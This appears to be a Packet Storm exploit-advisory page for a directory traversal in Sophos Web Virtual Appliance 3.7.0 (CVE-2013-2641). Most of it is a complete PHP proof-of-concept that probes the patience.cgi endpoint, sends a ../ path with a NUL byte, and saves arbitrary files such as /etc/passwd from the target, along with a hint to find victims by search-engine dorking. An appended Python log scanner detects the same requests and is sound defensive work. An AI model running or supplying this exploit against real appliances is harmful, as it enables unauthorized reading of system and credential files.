Sophos Web Virtual Appliance 3.7.0 Directory Traversal

๐Ÿ—“๏ธย 20 Feb 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 86ย Views

Directory traversal flaw in Sophos Web Virtual Appliance 3.7.0, with PoC PHP code that reads files from the appliance.

Related

Reporter | Title | Published | Views | Family
0day.today | Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution | 4 Apr 2013 00:00 | - | zdt
Circl | CVE-2013-2641 | 29 May 2018 15:50 | - | circl
Check Point Advisories | Sophos Web Protection Appliance patience.cgi Directory Traversal (CVE-2013-2641) | 15 Oct 2013 00:00 | - | checkpoint_advisories
CVE | CVE-2013-2641 | 18 Mar 2014 14:00 | - | cve
Cvelist | CVE-2013-2641 | 18 Mar 2014 14:00 | - | cvelist
Dsquare | Sophos Web Protection Appliance 3.7.8.1 File Disclosure | 10 Feb 2014 00:00 | - | dsquare
Dsquare | Sophos Web Protection Appliance 3.7.8.1 RCE | 10 Feb 2014 00:00 | - | dsquare
Exploit DB | Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities | 8 Apr 2013 00:00 | - | exploitdb
exploitpack | Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities | 8 Apr 2013 00:00 | - | exploitpack
Metasploit | Sophos Web Protection Appliance patience.cgi Directory Traversal | 10 Sep 2013 04:30 | - | metasploit

=============================================================================================================================================
    | # Title     : Sophos Web Virtual Appliance v3.7.0 Directory Traversal Vulnerability                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.sophos.com/en-us/support/downloads/virtual-web-appliance                                                        |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engine.
    
    [+] Code Description: This code exploits the directory traversal vulnerability in the Sophos Web Protection Appliance to retrieve any file from the system.
    
       cURL is used to send the HTTP requests; the response is checked to verify the success of the attack, and the retrieved content is saved to a local file.
       
       (Related: https://packetstorm.news/files/id/180832/ Linked CVE numbers: CVE-2013-2641).
    	
    [+] Save code as poc.php.
    
    [+] Set target : line 84
    
    [+] PayLoad :
    
    <?php
    
    class SophosTraversalExploit {
        private $target;
        private $port;
        private $filepath;
        private $depth;
    
        public function __construct($target, $port = 443, $filepath = '/etc/passwd', $depth = 2) {
            $this->target = $target;
            $this->port = $port;
            $this->filepath = $filepath;
            $this->depth = $depth;
        }
    
        private function my_basename($filename) {
            return basename(str_replace('\\', '/', $filename));
        }
    
        private function is_proficy() {
            $url = "https://{$this->target}:{$this->port}/cgi-bin/patience.cgi";
            $response = $this->send_request($url);
    
            if ($response && strpos($response['body'], 'The patience page request was not valid') !== false) {
                return true;
            }
            return false;
        }
    
        private function read_file() {
            $traversal_path = str_repeat('../', $this->depth) . $this->filepath . "%00";
            echo "Retrieving file contents...\n";
            
            $url = "https://{$this->target}:{$this->port}/cgi-bin/patience.cgi?id=" . urlencode($traversal_path);
            $response = $this->send_request($url);
    
            if ($response && ($response['code'] == 200 || $response['code'] == 500) && isset($response['headers']['X-Sophos-PatienceID'])) {
                return $response['body'];
            } else {
                echo "Error: " . $response['code'] . "\n" . $response['body'] . "\n";
                return null;
            }
        }
    
        private function send_request($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            
            $body = curl_exec($ch);
            $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $headers = curl_getinfo($ch);
            
            curl_close($ch);
            
            return ['code' => $code, 'body' => $body, 'headers' => $headers];
        }
    
        public function run() {
            echo "Checking if it's a Sophos Web Protect Appliance with the vulnerable component...\n";
            
            if ($this->is_proficy()) {
                echo "Check successful\n";
            } else {
                echo "Sophos Web Protect Appliance vulnerable component not found\n";
                return;
            }
    
            $contents = $this->read_file();
            if ($contents === null) {
                echo "File not downloaded\n";
                return;
            }
    
            $file_name = $this->my_basename($this->filepath);
            file_put_contents($file_name, $contents);
            echo "File saved as: " . $file_name . "\n";
        }
    }
    
    $exploit = new SophosTraversalExploit('target.com');
    $exploit->run();
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
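
An added detection example, not part of the original advisory or of any Sophos tooling: it scans web access logs for requests to the `patience.cgi` endpoint whose `id` parameter decodes to a `../` segment or a NUL byte, the two markers of the request the PoC above builds. The combined-log format, the sample lines and all function names are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/cgi-bin/patience.cgi"  # endpoint path taken from the PoC above
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
DOTDOT_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

# Constructed sample lines in combined-log style (not captured traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Feb/2026:10:00:01 +0000] "GET /cgi-bin/patience.cgi?id=..%2F..%2F%2Fetc%2Fpasswd%2500 HTTP/1.1" 200 1532
192.0.2.11 - - [20/Feb/2026:10:00:05 +0000] "GET /cgi-bin/patience.cgi?id=5f3c2a9e HTTP/1.1" 200 812
192.0.2.12 - - [20/Feb/2026:10:00:09 +0000] "GET /cgi-bin/patience.cgi?id=%252e%252e%252fetc%252fpasswd%00 HTTP/1.1" 500 0
192.0.2.13 - - [20/Feb/2026:10:00:12 +0000] "GET /index.html?id=../x HTTP/1.1" 404 120
"""

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_request(target):
    """Return the reasons a request target looks like traversal against ENDPOINT."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return []
    reasons = []
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        decoded = fully_decode(value)
        if "\x00" in decoded and "nul-byte" not in reasons:
            reasons.append("nul-byte")
        if DOTDOT_RE.search(decoded) and "dot-dot-segment" not in reasons:
            reasons.append("dot-dot-segment")
    return reasons

def scan(log_text):
    """Return (client, status, reasons) for every suspicious request line."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if match and (reasons := check_request(match.group(2))):
            hits.append((match.group(1), int(match.group(3)), reasons))
    return hits

if __name__ == "__main__":
    for client, status, reasons in scan(SAMPLE_LOG):
        print(client, status, ",".join(reasons))
```

A hit with status 200 or 500 deserves priority in triage, since those are the response codes the PoC treats as a successful read.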


20 Feb 2026 00:00 (Current)
Vulners AI Score: 5.4 (Medium risk)
CVSS 2: 5
EPSS: 0.8235